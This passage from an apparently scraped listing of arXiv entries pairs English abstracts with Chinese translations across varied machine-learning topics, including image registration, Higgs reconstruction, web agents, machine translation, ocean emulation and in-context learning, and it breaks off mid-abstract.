摘要: 深度学习在图像配准(DLIR)方法在图像配准方面取得了巨大成功,这是因为它们的速度和能力在训练时结合了弱标签监督。然而,现有的DLIR方法放弃了许多优化方法的好处和不变性。DLIR方法缺乏特定任务的归纳偏差,导致性能不佳,特别是在存在域转移的情况下。我们的方法旨在通过在深度网络中明确地将优化作为一层来弥合统计学习和优化之间的差距。一个深度网络被训练来预测多尺度密集特征图像,这些图像使用一个黑盒迭代优化求解器进行配准。然后使用这个最优变形来最小化图像和标签对齐错误。通过隐式地通过迭代优化求解器端到端地进行微分,我们明确地利用了由优化引起的对应匹配问题的不变性,同时学习配准和标签感知特征,并保证在特征空间中的配准目标的最小值是一个局部最小值。我们的框架在领域内数据集上表现出色,并且不受域转移的影响,比如各向异性和不同的强度配置。我们的方法首次允许在测试时在任意变换表示之间进行切换(从自由形式到微分同胚)而无需重新训练。端到端特征学习还有助于解释特征和任意测试时的正则化,这是现有DLIR方法所无法实现的。
更新时间: 2024-12-05 02:26:30
领域: cs.CV,cs.LG,eess.IV
Reconstruction of boosted and resolved multi-Higgs-boson events with symmetry-preserving attention networks
The production of multiple Higgs bosons at the CERN LHC provides a direct way to measure the trilinear and quartic Higgs self-interaction strengths as well as potential access to beyond the standard model effects that can enhance production at large transverse momentum $p_{\mathrm{T}}$. The largest event fraction arises from the fully hadronic final state in which every Higgs boson decays to a bottom quark-antiquark pair ($b\bar{b}$). This introduces a combinatorial challenge known as the \emph{jet assignment problem}: assigning jets to sets representing Higgs boson candidates. Symmetry-preserving attention networks (SPA-Nets) have been been developed to address this challenge. However, the complexity of jet assignment increases when simultaneously considering both $H\rightarrow b\bar{b}$ reconstruction possibilities, i.e., two "resolved" small-radius jets each containing a shower initiated by a $b$-quark or one "boosted" large-radius jet containing a merged shower initiated by a $b\bar{b}$ pair. The latter improves the reconstruction efficiency at high $p_{\mathrm{T}}$. In this work, we introduce a generalization to the SPA-Net approach to simultaneously consider both boosted and resolved reconstruction possibilities and unambiguously interpret an event as "fully resolved'', "fully boosted", or in between. We report the performance of baseline methods, the original SPA-Net approach, and our generalized version on nonresonant $HH$ and $HHH$ production at the LHC. Considering both boosted and resolved topologies, our SPA-Net approach increases the Higgs boson reconstruction purity by 57--62\% and the efficiency by 23--38\% compared to the baseline method depending on the final state.
Updated: 2024-12-05 02:24:52
标题: 使用保持对称性的注意力网络重建增强和分辨多希格斯玻色子事件
摘要: 在CERN LHC上产生多个希格斯玻色子提供了直接测量三线和四线希格斯自相互作用强度的方法,同时也可能获得超出标准模型效应的访问权限,这些效应可以增强在大横向动量$p_{\mathrm{T}}$下的产生。最大的事件分数来自完全强子最终态,其中每个希格斯玻色子衰变为一个底夸克-反夸克对($b\bar{b}$)。这引入了一个称为\emph{喷注分配问题}的组合挑战:将喷注分配给代表希格斯玻色子候选者的集合。已经开发了对称保持注意力网络(SPA-Nets)来解决这一挑战。然而,当同时考虑$H\rightarrow b\bar{b}$重建可能性时,即,两个“解析”小半径喷注,每个喷注包含一个由$b$夸克引发的淋浴,或者一个包含由一个$b\bar{b}$对引发的合并淋浴的“提升”大半径喷注时,喷注分配的复杂性增加。后者提高了在高$p_{\mathrm{T}}$下的重建效率。在这项工作中,我们引入了对SPA-Net方法的泛化,同时考虑提升和解析重建可能性,并清晰地解释一个事件为“完全解析”、“完全提升”或介于两者之间。我们报告了在LHC上非共振$HH$和$HHH$产生的基线方法、原始SPA-Net方法和我们的泛化版本的性能。考虑到提升和解析拓扑,我们的SPA-Net方法相比基线方法,根据最终状态,将希格斯玻色子重建纯度提高了57-62\%,将效率提高了23-38%。
更新时间: 2024-12-05 02:24:52
领域: hep-ph,cs.LG,hep-ex,physics.data-an
Synergizing LLMs and Knowledge Graphs: A Novel Approach to Software Repository-Related Question Answering
Software repositories contain valuable information for gaining insights into their development process. However, extracting insights from these repository data is time-consuming and requires technical expertise. While software engineering chatbots have been developed to facilitate natural language interactions with repositories, they struggle with understanding natural language and accurately retrieving relevant data. This study aims to improve the accuracy of LLM-based chatbots in answering repository-related questions by augmenting them with knowledge graphs. We achieve this in a two-step approach; (1) constructing a knowledge graph from the repository data and (2) synergizing the knowledge graph with LLM to allow for the natural language questions and answers. We curated a set of 20 questions with different complexities and evaluated our approach on five popular open-source projects. Our approach achieved an accuracy of 65%. We further investigated the limitations and identified six key issues, with the majority relating to the reasoning capability of the LLM. We experimented with a few-shot chain-of-thought prompting to determine if it could enhance our approach. This technique improved the overall accuracy to 84%. Our findings demonstrate the synergy between LLMs and knowledge graphs as a viable solution for making repository data accessible to both technical and non-technical stakeholders.
Updated: 2024-12-05 02:18:03
标题: 协同作用LLMs和知识图谱:软件仓库相关问题回答的新方法
摘要: 软件存储库包含有价值的信息,可以帮助了解其开发过程。然而,从这些存储库数据中提取见解是耗时且需要技术专长的。虽然已经开发了软件工程聊天机器人来促进与存储库的自然语言交互,但它们在理解自然语言和准确检索相关数据方面存在困难。本研究旨在通过增加知识图谱来改进LLM(语言模型)聊天机器人在回答与存储库相关的问题时的准确性。我们采用了一个两步方法来实现这一目标;(1)从存储库数据中构建知识图谱,(2)将知识图谱与LLM相结合,以便进行自然语言问答。我们精心策划了一组包含不同复杂性的20个问题,并在五个热门开源项目上评估了我们的方法。我们的方法实现了65%的准确性。我们进一步研究了限制因素,并确定了六个关键问题,其中大多数与LLM的推理能力有关。我们尝试了一种少样本连贯思考提示技术,以确定它是否能增强我们的方法。这种技术将整体准确性提高到84%。我们的研究结果表明,LLM和知识图谱之间的协同作用是使存储库数据对技术和非技术利益相关者都可访问的可行解决方案。
更新时间: 2024-12-05 02:18:03
领域: cs.SE,cs.AI,cs.CL,cs.LG
VimTS: A Unified Video and Image Text Spotter for Enhancing the Cross-domain Generalization
Text spotting, a task involving the extraction of textual information from image or video sequences, faces challenges in cross-domain adaption, such as image-to-image and image-to-video generalization. In this paper, we introduce a new method, termed VimTS, which enhances the generalization ability of the model by achieving better synergy among different tasks. Typically, we propose a Prompt Queries Generation Module and a Tasks-aware Adapter to effectively convert the original single-task model into a multi-task model suitable for both image and video scenarios with minimal additional parameters. The Prompt Queries Generation Module facilitates explicit interaction between different tasks, while the Tasks-aware Adapter helps the model dynamically learn suitable features for each task. Additionally, to further enable the model to learn temporal information at a lower cost, we propose a synthetic video text dataset (VTD-368k) by leveraging the Content Deformation Fields (CoDeF) algorithm. Notably, our method outperforms the state-of-the-art method by an average of 2.6% in six cross-domain benchmarks such as TT-to-IC15, CTW1500-to-TT, and TT-to-CTW1500. For video-level cross-domain adaption, our method even surpasses the previous end-to-end video spotting method in ICDAR2015 video and DSText v2 by an average of 5.5% on the MOTA metric, using only image-level data. We further demonstrate that existing Large Multimodal Models exhibit limitations in generating cross-domain scene text spotting, in contrast to our VimTS model which requires significantly fewer parameters and data. The code and datasets will be made available at the https://VimTextSpotter.github.io.
Updated: 2024-12-05 02:13:51
标题: VimTS:一种统一的视频和图像文本识别器,用于增强跨领域泛化
摘要: 文本识别是一项涉及从图像或视频序列中提取文本信息的任务,面临着跨领域适应的挑战,如图像到图像和图像到视频的泛化。在本文中,我们介绍了一种名为VimTS的新方法,通过实现不同任务之间更好的协同作用来增强模型的泛化能力。我们提出了一个提示查询生成模块和一个任务感知适配器,有效地将原始单任务模型转换为适用于图像和视频场景的多任务模型,而额外参数最小化。提示查询生成模块促进了不同任务之间的显式交互,而任务感知适配器帮助模型动态学习每个任务的适当特征。此外,为了进一步使模型以较低成本学习时间信息,我们利用内容变形场(CoDeF)算法提出了一个合成视频文本数据集(VTD-368k)。值得注意的是,我们的方法在六个跨领域基准测试中表现优于最先进的方法,如TT-to-IC15、CTW1500-to-TT和TT-to-CTW1500,平均提高了2.6%。对于视频级跨域适应,我们的方法甚至在仅使用图像级数据的情况下,在ICDAR2015视频和DSText v2上的MOTA指标上平均超过了先前的端到端视频识别方法5.5%。我们进一步证明,现有的大型多模态模型在生成跨领域场景文本识别方面存在限制,与我们的VimTS模型相比,后者需要更少的参数和数据。代码和数据集将在https://VimTextSpotter.github.io上提供。
更新时间: 2024-12-05 02:13:51
领域: cs.CV,cs.AI
SG-I2V: Self-Guided Trajectory Control in Image-to-Video Generation
Methods for image-to-video generation have achieved impressive, photo-realistic quality. However, adjusting specific elements in generated videos, such as object motion or camera movement, is often a tedious process of trial and error, e.g., involving re-generating videos with different random seeds. Recent techniques address this issue by fine-tuning a pre-trained model to follow conditioning signals, such as bounding boxes or point trajectories. Yet, this fine-tuning procedure can be computationally expensive, and it requires datasets with annotated object motion, which can be difficult to procure. In this work, we introduce SG-I2V, a framework for controllable image-to-video generation that is self-guided$\unicode{x2013}$offering zero-shot control by relying solely on the knowledge present in a pre-trained image-to-video diffusion model without the need for fine-tuning or external knowledge. Our zero-shot method outperforms unsupervised baselines while significantly narrowing down the performance gap with supervised models in terms of visual quality and motion fidelity.
Updated: 2024-12-05 02:08:20
标题: SG-I2V:图像到视频生成中的自导轨迹控制
摘要: 图像到视频生成的方法已经取得了令人印象深刻的逼真质量。然而,调整生成视频中的特定元素,如物体运动或摄像机移动,通常是一个繁琐的试错过程,例如,涉及使用不同的随机种子重新生成视频。最近的技术通过微调预训练模型以遵循条件信号,如边界框或点轨迹,来解决这个问题。然而,这种微调过程可能计算成本高昂,并且需要具有注释对象运动的数据集,这可能很难获得。在这项工作中,我们介绍了SG-I2V,一个用于可控图像到视频生成的框架,它是自导向的,通过仅依赖于预训练的图像到视频扩散模型中存在的知识来实现零-shot控制,而无需微调或外部知识。我们的零-shot方法在视觉质量和运动保真度方面优于无监督基线,同时显著缩小了与监督模型之间的性能差距。
更新时间: 2024-12-05 02:08:20
领域: cs.CV,cs.LG
ScribeAgent: Towards Specialized Web Agents Using Production-Scale Workflow Data
Large Language Model (LLM) agents are rapidly improving to handle increasingly complex web-based tasks. Most of these agents rely on general-purpose, proprietary models like GPT-4 and focus on designing better prompts to improve their planning abilities. However, general-purpose LLMs are not specifically trained to understand specialized web contexts such as HTML, and they often struggle with long-horizon planning. We explore an alternative approach that fine-tunes open-source LLMs using production-scale workflow data collected from over 250 domains corresponding to 6 billion tokens. This simple yet effective approach shows substantial gains over prompting-based agents on existing benchmarks -- ScribeAgent achieves state-of-the-art direct generation performance on Mind2Web and improves the task success rate by 7.3% over the previous best text-only web agents on WebArena. We further perform detailed ablation studies on various fine-tuning design choices and provide insights into LLM selection, training recipes, context window optimization, and effect of dataset sizes.
Updated: 2024-12-05 02:00:07
标题: ScribeAgent:利用生产规模工作流数据实现专门化网络代理
摘要: 大型语言模型(LLM)代理正在迅速改进,以处理越来越复杂的基于网络的任务。这些代理大多依赖于通用专有模型,如GPT-4,并专注于设计更好的提示以提高其规划能力。然而,通用目的的LLM并未经过特别训练以理解诸如HTML之类的专业网络环境,并且它们经常在长期规划方面遇到困难。我们探索了一种替代方法,即使用从超过250个领域收集的60亿个标记对应的生产规模工作流数据来微调开源LLM。这种简单而有效的方法在现有基准测试中比基于提示的代理获得了显著的增益-- ScribeAgent在Mind2Web上实现了最先进的直接生成性能,并将任务成功率提高了7.3%,超过了WebArena上先前最佳的纯文本网络代理。我们进一步对各种微调设计选择进行了详细的消融研究,并提供了关于LLM选择、训练配方、上下文窗口优化以及数据集大小影响的见解。
更新时间: 2024-12-05 02:00:07
领域: cs.CL,cs.AI
Data-driven Piecewise Affine Decision Rules for Stochastic Programming with Covariate Information
Focusing on stochastic programming (SP) with covariate information, this paper proposes an empirical risk minimization (ERM) method embedded within a nonconvex piecewise affine decision rule (PADR), which aims to learn the direct mapping from features to optimal decisions. We establish the nonasymptotic consistency result of our PADR-based ERM model for unconstrained problems and asymptotic consistency result for constrained ones. To solve the nonconvex and nondifferentiable ERM problem, we develop an enhanced stochastic majorization-minimization algorithm and establish the asymptotic convergence to (composite strong) directional stationarity along with complexity analysis. We show that the proposed PADR-based ERM method applies to a broad class of nonconvex SP problems with theoretical consistency guarantees and computational tractability. Our numerical study demonstrates the superior performance of PADR-based ERM methods compared to state-of-the-art approaches under various settings, with significantly lower costs, less computation time, and robustness to feature dimensions and nonlinearity of the underlying dependency.
Updated: 2024-12-05 01:50:52
标题: 基于数据驱动的带有协变量信息的分段线性决策规则的随机规划
摘要: 本文关注具有协变量信息的随机规划(SP),提出了一种嵌入非凸分段仿射决策规则(PADR)的经验风险最小化(ERM)方法,旨在学习从特征到最优决策的直接映射。我们为无约束问题建立了基于PADR的ERM模型的非渐近一致性结果,并为受约束问题建立了渐近一致性结果。为了解决非凸且不可微的ERM问题,我们开发了一种增强的随机主优化-最小化算法,并建立了与复杂性分析相结合的(复合强)方向稳定性的渐近收敛性。我们展示了提出的基于PADR的ERM方法适用于广泛的非凸SP问题,具有理论一致性保证和计算可行性。我们的数值研究表明,在各种设置下,与最先进的方法相比,基于PADR的ERM方法表现出卓越的性能,成本显著降低,计算时间更短,并且对特征维度和底层依赖的非线性具有鲁棒性。
更新时间: 2024-12-05 01:50:52
领域: math.OC,cs.LG,stat.ML
Agent AI with LangGraph: A Modular Framework for Enhancing Machine Translation Using Large Language Models
This paper explores the transformative role of Agent AI and LangGraph in advancing the automation and effectiveness of machine translation (MT). Agents are modular components designed to perform specific tasks, such as translating between particular languages, with specializations like TranslateEnAgent, TranslateFrenchAgent, and TranslateJpAgent for English, French, and Japanese translations, respectively. These agents leverage the powerful semantic capabilities of large language models (LLMs), such as GPT-4o, to ensure accurate, contextually relevant translations while maintaining modularity, scalability, and context retention. LangGraph, a graph-based framework built on LangChain, simplifies the creation and management of these agents and their workflows. It supports dynamic state management, enabling agents to maintain dialogue context and automates complex workflows by linking agents and facilitating their collaboration. With flexibility, open-source community support, and seamless integration with LLMs, LangGraph empowers agents to deliver high-quality translations. Together, Agent AI and LangGraph create a cohesive system where LangGraph orchestrates agent interactions, ensuring that user inputs are analyzed, routed, and processed efficiently. Experimental results demonstrate the potential of this system to enhance multilingual translation accuracy and scalability. By highlighting modular design and automated workflows, this paper sets the stage for further innovations in intelligent machine translation services.
Updated: 2024-12-05 01:45:12
标题: 代理AI与LangGraph:使用大型语言模型增强机器翻译的模块化框架
摘要: 本文探讨了Agent AI和LangGraph在推动机器翻译(MT)的自动化和效果方面的转变作用。代理是设计用于执行特定任务的模块化组件,例如在特定语言之间进行翻译,具有TranslateEnAgent,TranslateFrenchAgent和TranslateJpAgent等专业化,分别用于英语,法语和日语翻译。这些代理利用大型语言模型(LLMs)(如GPT-4o)的强大语义能力,以确保准确,具有上下文相关性的翻译,同时保持模块化,可扩展性和上下文保留。 LangGraph是基于LangChain构建的基于图的框架,简化了这些代理及其工作流程的创建和管理。它支持动态状态管理,使代理能够保持对话上下文,并通过连接代理并促进它们的协作来自动化复杂的工作流程。具有灵活性,开源社区支持以及与LLMs的无缝集成,LangGraph使代理能够提供高质量的翻译。 Agent AI和LangGraph共同创建了一个协调的系统,其中LangGraph编排代理之间的互动,确保用户输入被分析,路由和高效地处理。实验结果展示了该系统增强多语言翻译准确性和可扩展性的潜力。通过突出模块化设计和自动化工作流程,本文为智能机器翻译服务的进一步创新奠定了基础。
更新时间: 2024-12-05 01:45:12
领域: cs.CL,cs.AI
ELEMENT: Episodic and Lifelong Exploration via Maximum Entropy
This paper proposes \emph{Episodic and Lifelong Exploration via Maximum ENTropy} (ELEMENT), a novel, multiscale, intrinsically motivated reinforcement learning (RL) framework that is able to explore environments without using any extrinsic reward and transfer effectively the learned skills to downstream tasks. We advance the state of the art in three ways. First, we propose a multiscale entropy optimization to take care of the fact that previous maximum state entropy, for lifelong exploration with millions of state observations, suffers from vanishing rewards and becomes very expensive computationally across iterations. Therefore, we add an episodic maximum entropy over each episode to speedup the search further. Second, we propose a novel intrinsic reward for episodic entropy maximization named \emph{average episodic state entropy} which provides the optimal solution for a theoretical upper bound of the episodic state entropy objective. Third, to speed the lifelong entropy maximization, we propose a $k$ nearest neighbors ($k$NN) graph to organize the estimation of the entropy and updating processes that reduces the computation substantially. Our ELEMENT significantly outperforms state-of-the-art intrinsic rewards in both episodic and lifelong setups. Moreover, it can be exploited in task-agnostic pre-training, collecting data for offline reinforcement learning, etc.
Updated: 2024-12-05 01:42:13
标题: ELEMENT: 最大熵下的分段和终身探索
摘要: 本文提出了Episodic and Lifelong Exploration via Maximum ENTropy (ELEMENT),这是一个新颖的、多尺度的、固有动机的强化学习(RL)框架,能够在不使用任何外部奖励的情况下探索环境,并有效地将学到的技能传递给下游任务。我们在三个方面推动了技术前沿。首先,我们提出了多尺度熵优化,以解决过去的最大状态熵,在进行数百万次状态观察的终身探索时,会遇到奖励消失并在迭代中变得非常昂贵的问题。因此,我们在每一集中添加了一个剧集最大熵,以进一步加快搜索速度。其次,我们提出了一种新颖的用于剧集熵最大化的固有奖励,名为平均剧集状态熵,为剧集状态熵目标的理论上限提供了最佳解决方案。第三,为了加速终身熵最大化,我们提出了一个k最近邻(kNN)图,用于组织熵和更新过程的估计,从而大大减少计算量。我们的ELEMENT在剧集和终身设置中明显优于最先进的固有奖励。此外,它可以用于任务不可知的预训练、离线强化学习数据收集等方面。
更新时间: 2024-12-05 01:42:13
领域: cs.LG,cs.AI
Automated Multi-Label Annotation for Mental Health Illnesses Using Large Language Models
The growing prevalence and complexity of mental health disorders present significant challenges for accurate diagnosis and treatment, particularly in understanding the interplay between co-occurring conditions. Mental health disorders, such as depression and Anxiety, often co-occur, yet current datasets derived from social media posts typically focus on single-disorder labels, limiting their utility in comprehensive diagnostic analyses. This paper addresses this critical gap by proposing a novel methodology for cleaning, sampling, labeling, and combining data to create versatile multi-label datasets. Our approach introduces a synthetic labeling technique to transform single-label datasets into multi-label annotations, capturing the complexity of overlapping mental health conditions. To achieve this, two single-label datasets are first merged into a foundational multi-label dataset, enabling realistic analyses of co-occurring diagnoses. We then design and evaluate various prompting strategies for large language models (LLMs), ranging from single-label predictions to unrestricted prompts capable of detecting any present disorders. After rigorously assessing multiple LLMs and prompt configurations, the optimal combinations are identified and applied to label six additional single-disorder datasets from RMHD. The result is SPAADE-DR, a robust, multi-label dataset encompassing diverse mental health conditions. This research demonstrates the transformative potential of LLM-driven synthetic labeling in advancing mental health diagnostics from social media data, paving the way for more nuanced, data-driven insights into mental health care.
Updated: 2024-12-05 01:33:03
标题: 使用大型语言模型进行精神健康疾病的自动多标签注释
摘要: 随着心理健康障碍的不断普遍化和复杂化,准确诊断和治疗面临着重大挑战,特别是在理解共同存在疾病之间的相互作用方面。心理健康障碍,如抑郁症和焦虑症,经常同时出现,然而目前从社交媒体帖子中获取的数据集通常集中在单一障碍标签上,限制了它们在全面诊断分析中的实用性。本文通过提出一种清洗、抽样、标记和组合数据的新方法来填补这一关键差距,从而创建多功能多标签数据集。我们的方法引入了一种合成标记技术,将单标记数据集转换为多标记注释,捕捉了重叠心理健康状况的复杂性。为实现这一目标,首先将两个单标记数据集合并为一个基础多标记数据集,实现共同诊断的实际分析。然后我们设计和评估各种大型语言模型(LLMs)的提示策略,从单标记预测到能够检测任何现有障碍的不受限制的提示。经过严格评估多个LLMs和提示配置后,确定了最佳组合,并应用于标记RMHD的六个额外单一障碍数据集。其结果是SPAADE-DR,一个包含各种心理健康状况的强大多标签数据集。这项研究展示了LLM驱动的合成标记在推动社交媒体数据中的心理健康诊断方面的变革潜力,为更加细致、数据驱动的心理健康护理洞察铺平了道路。
更新时间: 2024-12-05 01:33:03
领域: cs.AI
Samudra: An AI Global Ocean Emulator for Climate
AI emulators for forecasting have emerged as powerful tools that can outperform conventional numerical predictions. The next frontier is to build emulators for long-term climate projections with robust skill across a wide range of spatiotemporal scales, a particularly important goal for the ocean. Our work builds a skillful global emulator of the ocean component of a state-of-the-art climate model. We emulate key ocean variables, sea surface height, horizontal velocities, temperature, and salinity, across their full depth. We use a modified ConvNeXt UNet architecture trained on multidepth levels of ocean data. We show that the ocean emulator - Samudra - which exhibits no drift relative to the truth, can reproduce the depth structure of ocean variables and their interannual variability. Samudra is stable for centuries and 150 times faster than the original ocean model. Samudra struggles to capture the correct magnitude of the forcing trends and simultaneously remains stable, requiring further work.
Updated: 2024-12-05 01:25:34
标题: 萨姆德拉:用于气候的人工智能全球海洋模拟器
摘要: AI仿真器已经成为强大的工具,可以胜过传统的数值预测。下一个前沿是建立具有广泛空间时间尺度上强健技能的长期气候预测仿真器,这对于海洋尤为重要。我们的工作建立了一种高技能的全球海洋组件仿真器,该仿真器是一种先进气候模型的一部分。我们模拟了关键海洋变量,包括海表高度、水平速度、温度和盐度,覆盖了它们的全部深度。我们使用经过训练的多深度海洋数据的修改ConvNeXt UNet架构。我们展示了海洋仿真器Samudra不会相对于真实情况漂移,可以复制海洋变量的深度结构及其年际变化。Samudra稳定地运行了数个世纪,比原始海洋模型快150倍。Samudra难以捕捉正确的强迫趋势的幅度,并同时保持稳定,需要进一步的工作。
更新时间: 2024-12-05 01:25:34
领域: physics.ao-ph,cs.LG
Designing LLM Chains by Adapting Techniques from Crowdsourcing Workflows
LLM chains enable complex tasks by decomposing work into a sequence of subtasks. Similarly, the more established techniques of crowdsourcing workflows decompose complex tasks into smaller tasks for human crowdworkers. Chains address LLM errors analogously to the way crowdsourcing workflows address human error. To characterize opportunities for LLM chaining, we survey 107 papers across the crowdsourcing and chaining literature to construct a design space for chain development. The design space covers a designer's objectives and the tactics used to build workflows. We then surface strategies that mediate how workflows use tactics to achieve objectives. To explore how techniques from crowdsourcing may apply to chaining, we adapt crowdsourcing workflows to implement LLM chains across three case studies: creating a taxonomy, shortening text, and writing a short story. From the design space and our case studies, we identify takeaways for effective chain design and raise implications for future research and development.
Updated: 2024-12-05 01:03:37
标题: 利用众包工作流技术设计LLM链路
摘要: LLM链通过将工作分解为一系列子任务来实现复杂任务。同样,众包工作流的更成熟技术将复杂任务分解为小任务,供人类众包工作者完成。链类似于众包工作流,能够处理LLM错误,就像众包工作流处理人类错误一样。为了表征LLM链的机会,我们调查了107篇涵盖众包和链条文献的论文,构建了一个链条发展的设计空间。设计空间涵盖了设计者的目标和构建工作流的策略。然后我们提出了调节工作流如何使用策略来实现目标的策略。为了探索众包技术如何应用于链条,我们将众包工作流应用于三个案例研究中来实现LLM链:创建分类法,缩短文本和撰写短篇故事。通过设计空间和我们的案例研究,我们总结了有效链条设计的要点,并提出了未来研究和发展的影响。
更新时间: 2024-12-05 01:03:37
领域: cs.HC,cs.AI,cs.CL
Safe Adaptive Cruise Control Under Perception Uncertainty: A Deep Ensemble and Conformal Tube Model Predictive Control Approach
Autonomous driving heavily relies on perception systems to interpret the environment for decision-making. To enhance robustness in these safety critical applications, this paper considers a Deep Ensemble of Deep Neural Network regressors integrated with Conformal Prediction to predict and quantify uncertainties. In the Adaptive Cruise Control setting, the proposed method performs state and uncertainty estimation from RGB images, informing the downstream controller of the DNN perception uncertainties. An adaptive cruise controller using Conformal Tube Model Predictive Control is designed to ensure probabilistic safety. Evaluations with a high-fidelity simulator demonstrate the algorithm's effectiveness in speed tracking and safe distance maintaining, including in Out-Of-Distribution scenarios.
Updated: 2024-12-05 01:01:53
标题: 在感知不确定性下的安全自适应巡航控制:深度集成和符合管模型预测控制方法
摘要: 自动驾驶严重依赖感知系统来解释环境以做出决策。为增强这些安全关键应用程序的鲁棒性,本文考虑了一个深度集成深度神经网络回归器和符合预测的深度集合。在自适应巡航控制设置中,所提出的方法从RGB图像中执行状态和不确定性估计,通知DNN感知不确定性的下游控制器。设计了使用符合管模型预测控制的自适应巡航控制器,以确保概率安全。在高保真度模拟器上的评估表明,该算法在速度跟踪和保持安全距离方面的有效性,包括在分布场景中。
更新时间: 2024-12-05 01:01:53
领域: cs.RO,cs.AI,cs.SY,eess.SY
Coordinate In and Value Out: Training Flow Transformers in Ambient Space
Flow matching models have emerged as a powerful method for generative modeling on domains like images or videos, and even on unstructured data like 3D point clouds. These models are commonly trained in two stages: first, a data compressor (i.e., a variational auto-encoder) is trained, and in a subsequent training stage a flow matching generative model is trained in the low-dimensional latent space of the data compressor. This two stage paradigm adds complexity to the overall training recipe and sets obstacles for unifying models across data domains, as specific data compressors are used for different data modalities. To this end, we introduce Ambient Space Flow Transformers (ASFT), a domain-agnostic approach to learn flow matching transformers in ambient space, sidestepping the requirement of training compressors and simplifying the training process. We introduce a conditionally independent point-wise training objective that enables ASFT to make predictions continuously in coordinate space. Our empirical results demonstrate that using general purpose transformer blocks, ASFT effectively handles different data modalities such as images and 3D point clouds, achieving strong performance in both domains and outperforming comparable approaches. ASFT is a promising step towards domain-agnostic flow matching generative models that can be trivially adopted in different data domains.
Updated: 2024-12-05 01:00:07
标题: 输入协调,输出数值:在环境空间中训练流变换器
摘要: 流匹配模型已经成为在诸如图像或视频等领域进行生成建模的强大方法,甚至在像3D点云这样的非结构化数据上也是如此。这些模型通常经过两个阶段的训练:首先,训练数据压缩器(即变分自编码器),然后在接下来的训练阶段,在数据压缩器的低维潜在空间中训练流匹配生成模型。这种两阶段范式增加了整体训练方案的复杂性,并为统一模型跨越数据领域设置了障碍,因为不同数据模态使用特定的数据压缩器。为此,我们介绍了环境空间流变换器(ASFT),这是一种领域无关的方法,在环境空间中学习流匹配变换器,避开了训练压缩器的要求,简化了训练过程。我们引入了一个条件独立的逐点训练目标,使ASFT能够在坐标空间中连续地进行预测。我们的实证结果表明,使用通用变换器模块,ASFT有效处理不同数据模态,如图像和3D点云,在两个领域都取得了良好的性能,并超过了可比较的方法。ASFT是朝着领域无关的流匹配生成模型迈出的一步,可以轻松地在不同数据领域中采用。
更新时间: 2024-12-05 01:00:07
领域: cs.LG,cs.AI
Speech Recognition-based Feature Extraction for Enhanced Automatic Severity Classification in Dysarthric Speech
Due to the subjective nature of current clinical evaluation, the need for automatic severity evaluation in dysarthric speech has emerged. DNN models outperform ML models but lack user-friendly explainability. ML models offer explainable results at a feature level, but their performance is comparatively lower. Current ML models extract various features from raw waveforms to predict severity. However, existing methods do not encompass all dysarthric features used in clinical evaluation. To address this gap, we propose a feature extraction method that minimizes information loss. We introduce an ASR transcription as a novel feature extraction source. We finetune the ASR model for dysarthric speech, then use this model to transcribe dysarthric speech and extract word segment boundary information. It enables capturing finer pronunciation and broader prosodic features. These features demonstrated an improved severity prediction performance to existing features: balanced accuracy of 83.72%.
Updated: 2024-12-05 00:12:53
标题: 基于语音识别的特征提取用于增强在运动障碍性言语中自动严重程度分类
摘要: 由于当前临床评估的主观性,自动评估运动障碍性言语严重程度的需求已经出现。深度神经网络模型优于机器学习模型,但缺乏用户友好的可解释性。机器学习模型在特征级别上提供可解释的结果,但其性能相对较低。当前机器学习模型从原始波形中提取各种特征以预测严重程度。然而,现有方法并未涵盖临床评估中使用的所有运动障碍性言语特征。为了填补这一空白,我们提出了一种最小化信息损失的特征提取方法。我们将自动语音识别转录引入作为一种新颖的特征提取来源。我们对运动障碍性言语进行微调,然后使用该模型转录运动障碍性言语并提取单词片段边界信息。这使得能够捕捉更精细的发音和更广泛的韵律特征。这些特征表现出了对现有特征的改进严重程度预测性能:平衡准确率为83.72%。
更新时间: 2024-12-05 00:12:53
领域: cs.SD,cs.AI,eess.AS
Expressivity of Representation Learning on Continuous-Time Dynamic Graphs: An Information-Flow Centric Review
Graphs are ubiquitous in real-world applications, ranging from social networks to biological systems, and have inspired the development of Graph Neural Networks (GNNs) for learning expressive representations. While most research has centered on static graphs, many real-world scenarios involve dynamic, temporally evolving graphs, motivating the need for Continuous-Time Dynamic Graph (CTDG) models. This paper provides a comprehensive review of Graph Representation Learning (GRL) on CTDGs with a focus on Self-Supervised Representation Learning (SSRL). We introduce a novel theoretical framework that analyzes the expressivity of CTDG models through an Information-Flow (IF) lens, quantifying their ability to propagate and encode temporal and structural information. Leveraging this framework, we categorize existing CTDG methods based on their suitability for different graph types and application scenarios. Within the same scope, we examine the design of SSRL methods tailored to CTDGs, such as predictive and contrastive approaches, highlighting their potential to mitigate the reliance on labeled data. Empirical evaluations on synthetic and real-world datasets validate our theoretical insights, demonstrating the strengths and limitations of various methods across long-range, bi-partite and community-based graphs. This work offers both a theoretical foundation and practical guidance for selecting and developing CTDG models, advancing the understanding of GRL in dynamic settings.
Updated: 2024-12-05 00:12:50
标题: 连续时间动态图上表示学习的表现力:基于信息流的综述
摘要: 图在现实世界的应用中无处不在,从社交网络到生物系统,激发了图神经网络(GNNs)的发展,用于学习表达性表示。尽管大多数研究集中在静态图上,但许多现实场景涉及动态、时间演化的图,这促使了对连续时间动态图(CTDG)模型的需求。本文全面审查了关于CTDG上的图表示学习(GRL),重点关注自监督表示学习(SSRL)。我们引入了一个新颖的理论框架,通过信息流(IF)镜头分析了CTDG模型的表达能力,量化它们传播和编码时间和结构信息的能力。利用这个框架,我们将现有的CTDG方法进行分类,根据它们适用于不同类型的图和应用场景。在同样的范围内,我们审查了针对CTDG量身定制的SSRL方法的设计,比如预测和对比方法,突出它们减轻对标记数据依赖的潜力。对合成和真实世界数据集的实证评估验证了我们的理论见解,展示了各种方法在长距离、双向和基于社区的图中的优势和局限性。这项工作为选择和开发CTDG模型提供了理论基础和实践指导,推动了在动态环境中对GRL的理解。
更新时间: 2024-12-05 00:12:50
领域: cs.LG,cs.AI,68R10, 05Cxx, 68Txx,I.2.6; I.5.1; G.2.2
The broader spectrum of in-context learning
The ability of language models to learn a task from a few examples in context has generated substantial interest. Here, we provide a perspective that situates this type of supervised few-shot learning within a much broader spectrum of meta-learned in-context learning. Indeed, we suggest that any distribution of sequences in which context non-trivially decreases loss on subsequent predictions can be interpreted as eliciting a kind of in-context learning. We suggest that this perspective helps to unify the broad set of in-context abilities that language models exhibit $\unicode{x2014}$ such as adapting to tasks from instructions or role play, or extrapolating time series. This perspective also sheds light on potential roots of in-context learning in lower-level processing of linguistic dependencies (e.g. coreference or parallel structures). Finally, taking this perspective highlights the importance of generalization, which we suggest can be studied along several dimensions: not only the ability to learn something novel, but also flexibility in learning from different presentations, 